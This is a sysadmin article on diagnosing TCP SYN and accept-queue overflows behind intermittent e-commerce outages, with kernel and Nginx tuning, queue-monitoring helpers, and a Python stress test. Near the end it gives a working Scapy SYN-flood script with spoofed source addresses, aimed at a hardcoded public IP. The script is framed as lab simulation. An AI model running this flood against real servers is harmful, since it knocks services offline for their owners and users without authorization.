
Diagnosing and Fixing TCP SYN Queue Overflows that Crash E‑commerce Sites

This article walks through a real‑world incident where an e‑commerce site suffered intermittent outages due to TCP SYN and accept queue overflows, explains the underlying handshake mechanics, shows how kernel and Nginx parameters can be tuned, and provides Python scripts for testing and SYN‑flood simulation.

Efficient Ops

Problem description: the monitoring system reported intermittent inaccessibility of the e‑commerce homepage and other pages; security and traffic metrics looked normal, and a server reboot only temporarily resolved the issue.

Preliminary judgment: check device and network interface errors (using cat /proc/net/dev and ifconfig), and observe socket overflow and dropped sockets (e.g., netstat -s | grep -i listen).
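The counters that netstat -s summarizes come from the TcpExt rows of /proc/net/netstat. As a minimal sketch, assuming a Linux host that exposes the ListenOverflows and ListenDrops fields there, the following reads them directly so that two samples can be compared. The function names are illustrative and not part of any existing tool.

```python
def parse_tcpext(text):
    """Parse the TcpExt header/value line pair from /proc/net/netstat text."""
    lines = [ln.split() for ln in text.splitlines() if ln.startswith("TcpExt:")]
    if len(lines) < 2:
        return {}
    names, values = lines[0][1:], lines[1][1:]
    return {name: int(value) for name, value in zip(names, values)}


def listen_counters(text):
    """Keep only the two counters that point at listen-queue trouble."""
    stats = parse_tcpext(text)
    return {key: stats.get(key, 0) for key in ("ListenOverflows", "ListenDrops")}


def counter_delta(before, after):
    """Difference between two samples; growth means drops are still happening."""
    return {key: after[key] - before[key] for key in after}


def read_listen_counters(path="/proc/net/netstat"):
    """Read the counters from the live system (Linux only)."""
    with open(path) as fh:
        return listen_counters(fh.read())
```

Calling read_listen_counters() twice a few seconds apart and passing both results to counter_delta() shows whether the overflow is ongoing or historical, since the raw counters only ever accumulate since boot.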

Observation: the listen-queue overflow and dropped-SYN counters were increasing sharply.

Check kernel sysctl parameters: net.ipv4.tcp_syncookies, net.ipv4.tcp_max_syn_backlog, net.core.somaxconn.
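Each of these sysctl names maps to a file under /proc/sys, with the dots replaced by path separators. A small sketch, assuming a Linux host and using hypothetical helper names, that collects the three values in one call:

```python
from pathlib import Path

# The three parameters named in the checklist above.
WATCHED = (
    "net.ipv4.tcp_syncookies",
    "net.ipv4.tcp_max_syn_backlog",
    "net.core.somaxconn",
)


def sysctl_path(name, root="/proc/sys"):
    """Map a dotted sysctl name to its file under /proc/sys."""
    return Path(root).joinpath(*name.split("."))


def read_sysctls(names=WATCHED, root="/proc/sys"):
    """Return {name: value as string}; None when the file cannot be read."""
    values = {}
    for name in names:
        try:
            values[name] = sysctl_path(name, root).read_text().strip()
        except OSError:
            values[name] = None
    return values
```

The root parameter exists only so the helper can be pointed at a test directory; on a real host, read_sysctls() with no arguments is the intended call.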

Inspect SELinux and NetworkManager status; disable if necessary.

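Verify the timestamp and reuse settings (net.ipv4.tcp_timestamps, net.ipv4.tcp_tw_reuse), and whether net.ipv4.tcp_tw_recycle is enabled. On kernels that still provide it (it was removed in Linux 4.12), recycle combined with timestamps can cause SYNs from clients behind NAT to be dropped.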

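Deep analysis: during the TCP three‑way handshake a new connection first enters the half‑connection (SYN) queue and moves to the full‑connection (accept) queue once the client's final ACK arrives. When the accept queue is full, the kernel follows the tcp_abort_on_overflow setting. With the default value 0, the server silently discards the client's ACK, so the connection stays incomplete on the server side even though the client considers it established.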

# cat /proc/sys/net/ipv4/tcp_abort_on_overflow
0

Changing tcp_abort_on_overflow to 1 makes the server send a reset packet when the accept queue is full, which surfaces as “connection reset by peer” in the web logs, confirming the root cause.
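The decision the kernel makes on the final ACK can be illustrated with a toy model. This is a deliberately simplified sketch, not kernel code: the class name, the return strings, and the exact "full" condition are assumptions made for illustration, and retransmission timers are left out.

```python
from collections import deque


class ListenSocketModel:
    """Toy model of one listening socket's two queues (not kernel code)."""

    def __init__(self, accept_limit, abort_on_overflow=0):
        self.accept_limit = accept_limit
        self.abort_on_overflow = abort_on_overflow
        self.syn_queue = set()       # half-open: SYN seen, final ACK pending
        self.accept_queue = deque()  # established, waiting for accept()

    def on_syn(self, client):
        """First handshake step: remember the client and answer SYN+ACK."""
        self.syn_queue.add(client)
        return "SYN+ACK"

    def on_ack(self, client):
        """Third handshake step: promote, drop the ACK, or reset."""
        if client not in self.syn_queue:
            return "ignored"
        if len(self.accept_queue) >= self.accept_limit:
            if self.abort_on_overflow:
                self.syn_queue.discard(client)
                return "RST"
            return "ACK dropped"  # entry stays half-open and may be retried
        self.syn_queue.discard(client)
        self.accept_queue.append(client)
        return "established"

    def accept(self):
        """Application side: take one established connection off the queue."""
        return self.accept_queue.popleft() if self.accept_queue else None
```

With abort_on_overflow=0 the client gets no signal at all when the queue is full, which matches the silent, intermittent failures described above; with 1 the failure becomes a visible reset.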

Kernel and Nginx tuning performed:

Linux kernel parameters:

net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_max_syn_backlog = 16384
net.core.somaxconn = 16384

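Nginx configuration (backlog parameter of the listen directive): backlog=32768; note that the kernel caps the accept queue at net.core.somaxconn, so with the values above the effective limit is 16384 unless somaxconn is raised as well.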
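On Linux the backlog passed to listen() is silently truncated to net.core.somaxconn, so the two values have to be read together. A minimal sketch of that arithmetic, using the numbers from this incident; the function names are hypothetical:

```python
def effective_accept_backlog(listen_backlog, somaxconn):
    """Linux silently caps the listen() backlog at net.core.somaxconn."""
    return min(listen_backlog, somaxconn)


def backlog_report(listen_backlog, somaxconn):
    """Describe whether the configured backlog actually takes effect."""
    effective = effective_accept_backlog(listen_backlog, somaxconn)
    if effective < listen_backlog:
        return f"backlog {listen_backlog} is capped to {effective} by somaxconn"
    return f"backlog {listen_backlog} is in effect (somaxconn {somaxconn})"


# Values from the tuning above: Nginx backlog=32768, somaxconn=16384.
print(backlog_report(32768, 16384))
```

Because the cap is applied when the socket starts listening, a change to somaxconn only reaches an already running Nginx after its listening sockets are reopened.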

Python multithreaded stress test (no new issues found):

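<code>import requests
from bs4 import BeautifulSoup
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urljoin

url = 'https://www.wuage.com/'
response = requests.get(url, timeout=10)
soup = BeautifulSoup(response.text, 'html.parser')

# Resolve relative links against the homepage and keep only HTTP(S) URLs.
links = {urljoin(url, a['href']) for a in soup.find_all('a', href=True)}
links = [link for link in links if link.startswith(('http://', 'https://'))]

with ThreadPoolExecutor(max_workers=20) as ex:
    futures = [ex.submit(requests.get, link, timeout=10) for link in links]
    for future in as_completed(futures):
        try:
            # Exceptions raised in a worker only surface when result() is called.
            future.result()
        except Exception as err:
            print('return error msg:' + str(err))
</code>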

Understanding TCP handshake queues

The kernel keeps two queues for each listening socket: the SYN (half‑connection) queue and the accept (full‑connection) queue. During the first handshake step, the server places the SYN in the half‑connection queue and replies with SYN+ACK. In the third step, when the client's ACK arrives, the server moves the entry to the accept queue if that queue is not full; otherwise it follows the tcp_abort_on_overflow policy.

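If the accept queue is full and tcp_abort_on_overflow is 0, the server drops the ACK and later retransmits SYN+ACK (up to net.ipv4.tcp_synack_retries times), so a client with a short timeout will likely fail before the connection is ever accepted.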
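The state of the accept queue can be observed with ss -lnt: for sockets in the LISTEN state, Recv-Q is the number of connections currently waiting in the accept queue and Send-Q is the queue's limit. The sketch below parses that output and flags sockets at their limit. It assumes the iproute2 ss command is installed and that the first four columns are State, Recv-Q, Send-Q, and Local Address:Port; the helper names are illustrative.

```python
import subprocess


def parse_ss_listen(output):
    """Extract accept-queue usage for LISTEN sockets from `ss -lnt` output."""
    rows = []
    for line in output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue  # skips the header and any non-listening rows
        rows.append({
            "local": fields[3],
            "queued": int(fields[1]),  # Recv-Q: connections awaiting accept()
            "limit": int(fields[2]),   # Send-Q: configured accept-queue limit
        })
    return rows


def saturated(rows):
    """Sockets whose accept queue has reached its limit."""
    return [r for r in rows if r["limit"] > 0 and r["queued"] >= r["limit"]]


def listen_sockets():
    """Run `ss -lnt` on the local host and parse the result."""
    result = subprocess.run(
        ["ss", "-lnt"], capture_output=True, text=True, check=True
    )
    return parse_ss_listen(result.stdout)
```

Running saturated(listen_sockets()) periodically during an incident shows which listener is backing up, which complements the cumulative overflow counters from netstat -s.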

SYN Flood (DoS) attack example

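<code>import random
from concurrent.futures import ThreadPoolExecutor
from scapy.all import IP, TCP, send

# Lab use only: run this solely against a test host you own or are authorized to test.
def synFlood(tgt, dPort):
    # Spoofed source addresses; the target's SYN+ACK replies are never answered.
    srcList = ['11.1.1.2','22.1.1.102','33.1.1.2','125.130.5.199']
    for sPort in range(1024, 65535):
        index = random.randrange(4)
        ipLayer = IP(src=srcList[index], dst=tgt)
        tcpLayer = TCP(sport=sPort, dport=dPort, flags='S')
        packet = ipLayer/tcpLayer
        send(packet)

tgt = '139.196.251.198'  # replace with the address of your own test server
print(tgt)
dPort = 443

# Only one task is submitted, so a single worker is sufficient.
with ThreadPoolExecutor(max_workers=1) as ex:
    future = ex.submit(synFlood, tgt, dPort)
    try:
        # Exceptions from the worker are only raised when result() is called.
        future.result()
    except Exception as err:
        print('return error msg:' + str(err))
</code>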

TCP half‑connection and full‑connection queue problems are easy to overlook but critical, especially for services dominated by short‑lived connections, so it is worth building robust incident‑response mechanisms that monitor these queues.
